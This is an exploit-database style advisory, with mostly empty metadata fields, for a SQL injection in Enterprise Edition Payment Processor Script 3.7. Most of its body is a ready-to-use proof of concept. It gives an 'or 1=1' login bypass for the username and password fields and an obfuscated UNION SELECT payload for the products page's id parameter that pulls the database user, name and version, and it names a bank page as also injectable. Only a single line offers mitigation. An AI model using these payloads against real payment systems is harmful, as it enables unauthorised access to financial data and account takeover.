vendor:
Enterprise Edition Payment Processor Script
by:
Ihsan Sencan
N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name: Enterprise Edition Payment Processor Script
Affected Version From: 3.7
Affected Version To: 3.7
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2017
Enterprise Edition Payment Processor Script 3.7 – SQL Injection
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/login User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''=' http://localhost/[PATH]/products?id=[SQL]&action=update -1++/*!00002UNION*/(/*!00002SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,/*!00002CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()))--+-&action=update http://localhost/[PATH]/bank?id=[SQL]&action=update Etc..
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.